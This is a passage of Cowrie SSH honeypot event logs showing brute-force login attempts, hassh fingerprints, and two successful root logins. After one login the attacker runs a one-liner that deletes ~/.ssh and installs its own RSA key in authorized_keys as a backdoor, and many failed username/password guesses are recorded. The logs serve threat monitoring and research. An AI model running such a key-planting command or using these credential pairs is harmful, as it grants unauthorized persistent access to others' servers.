client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:10:01.596480Z","src_ip":"152.32.190.168","session":"87d611c123f5"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"Welcome1","message":"login attempt [uftp/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:10:02.671102Z","src_ip":"152.32.190.168","session":"87d611c123f5"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:03.933440Z","src_ip":"152.32.190.168","session":"87d611c123f5"}
{"eventid":"cowrie.session.connect","src_ip":"211.22.25.164","src_port":44268,"dst_ip":"1.2.3.4","dst_port":22,"session":"e14c765c3950","protocol":"ssh","message":"New connection: 211.22.25.164:44268 (1.2.3.4:22) [session: e14c765c3950]","sensor":"my-vps","timestamp":"2025-09-09T04:10:09.351935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:10:09.352874Z","src_ip":"211.22.25.164","session":"e14c765c3950"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:10:09.593184Z","src_ip":"211.22.25.164","session":"e14c765c3950"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"Welcome1","message":"login attempt [hammer/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:10:10.593148Z","src_ip":"211.22.25.164","session":"e14c765c3950"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:11.836290Z","src_ip":"211.22.25.164","session":"e14c765c3950"}
{"eventid":"cowrie.session.closed","duration":13.149999856948853,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:13.285130Z","src_ip":"101.51.128.71","session":"7e37d539c96b"}
{"eventid":"cowrie.session.connect","src_ip":"154.209.4.55","src_port":36014,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ec5d84c582b","protocol":"ssh","message":"New connection: 154.209.4.55:36014 (1.2.3.4:22) [session: 7ec5d84c582b]","sensor":"my-vps","timestamp":"2025-09-09T04:10:29.924875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:10:29.928359Z","src_ip":"154.209.4.55","session":"7ec5d84c582b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:10:30.126806Z","src_ip":"154.209.4.55","session":"7ec5d84c582b"}
{"eventid":"cowrie.login.failed","username":"db2admin","password":"password1","message":"login attempt [db2admin/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T04:10:30.922134Z","src_ip":"154.209.4.55","session":"7ec5d84c582b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:32.128391Z","src_ip":"154.209.4.55","session":"7ec5d84c582b"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":54920,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac8aa2079b4c","protocol":"ssh","message":"New connection: 51.81.118.153:54920 (1.2.3.4:22) [session: ac8aa2079b4c]","sensor":"my-vps","timestamp":"2025-09-09T04:10:35.925841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:10:35.927024Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:10:36.020326Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.login.success","username":"root","password":"root@...","message":"login attempt [root/root@...] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:10:36.438588Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:10:36.676865Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:10:36.677596Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:10:36.678828Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:36.774001Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:10:36.977324Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:10:36.978018Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:10:37.075225Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:37.076170Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":54928,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e7011dfa92b","protocol":"ssh","message":"New connection: 51.81.118.153:54928 (1.2.3.4:22) [session: 6e7011dfa92b]","sensor":"my-vps","timestamp":"2025-09-09T04:10:37.174277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:10:37.175548Z","src_ip":"51.81.118.153","session":"6e7011dfa92b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:10:37.272182Z","src_ip":"51.81.118.153","session":"6e7011dfa92b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:10:37.698367Z","src_ip":"51.81.118.153","session":"6e7011dfa92b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:38.795692Z","src_ip":"51.81.118.153","session":"6e7011dfa92b"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":54942,"dst_ip":"1.2.3.4","dst_port":22,"session":"534f43d2700e","protocol":"ssh","message":"New connection: 51.81.118.153:54942 (1.2.3.4:22) [session: 534f43d2700e]","sensor":"my-vps","timestamp":"2025-09-09T04:10:38.890614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:10:38.891281Z","src_ip":"51.81.118.153","session":"534f43d2700e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:10:38.989223Z","src_ip":"51.81.118.153","session":"534f43d2700e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:10:39.416053Z","src_ip":"51.81.118.153","session":"534f43d2700e"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:39.511713Z","src_ip":"51.81.118.153","session":"ac8aa2079b4c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:39.512966Z","src_ip":"51.81.118.153","session":"534f43d2700e"}
{"eventid":"cowrie.session.connect","src_ip":"102.68.86.62","src_port":43680,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d54c2ce0a04","protocol":"ssh","message":"New connection: 102.68.86.62:43680 (1.2.3.4:22) [session: 4d54c2ce0a04]","sensor":"my-vps","timestamp":"2025-09-09T04:10:49.406889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:10:49.408058Z","src_ip":"102.68.86.62","session":"4d54c2ce0a04"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:10:49.578434Z","src_ip":"102.68.86.62","session":"4d54c2ce0a04"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"P@ssw0rd","message":"login attempt [gpadmin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T04:10:50.298977Z","src_ip":"102.68.86.62","session":"4d54c2ce0a04"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:51.471773Z","src_ip":"102.68.86.62","session":"4d54c2ce0a04"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":53266,"dst_ip":"1.2.3.4","dst_port":22,"session":"579bfcab4022","protocol":"ssh","message":"New connection: 192.210.135.20:53266 (1.2.3.4:22) [session: 579bfcab4022]","sensor":"my-vps","timestamp":"2025-09-09T04:10:55.198750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:10:55.199693Z","src_ip":"192.210.135.20","session":"579bfcab4022"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:10:55.309675Z","src_ip":"192.210.135.20","session":"579bfcab4022"}
{"eventid":"cowrie.login.failed","username":"nfsnobod","password":"111111","message":"login attempt [nfsnobod/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T04:10:55.788269Z","src_ip":"192.210.135.20","session":"579bfcab4022"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:10:56.900209Z","src_ip":"192.210.135.20","session":"579bfcab4022"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24521,"dst_ip":"1.2.3.4","dst_port":22,"session":"6334f49f35c0","protocol":"ssh","message":"New connection: 212.227.235.229:24521 (1.2.3.4:22) [session: 6334f49f35c0]","sensor":"my-vps","timestamp":"2025-09-09T04:11:05.285262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T04:11:05.289258Z","src_ip":"212.227.235.229","session":"6334f49f35c0"}
{"eventid":"cowrie.client.kex","hassh":"7216c7c473918b4f83d1139b3c70dbf9","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc,arcfour;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc","arcfour"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 7216c7c473918b4f83d1139b3c70dbf9","sensor":"my-vps","timestamp":"2025-09-09T04:11:05.491202Z","src_ip":"212.227.235.229","session":"6334f49f35c0"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":36024,"dst_ip":"1.2.3.4","dst_port":22,"session":"52670f023dc5","protocol":"ssh","message":"New connection: 152.32.190.168:36024 (1.2.3.4:22) [session: 52670f023dc5]","sensor":"my-vps","timestamp":"2025-09-09T04:11:07.252208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:11:07.252931Z","src_ip":"152.32.190.168","session":"52670f023dc5"}
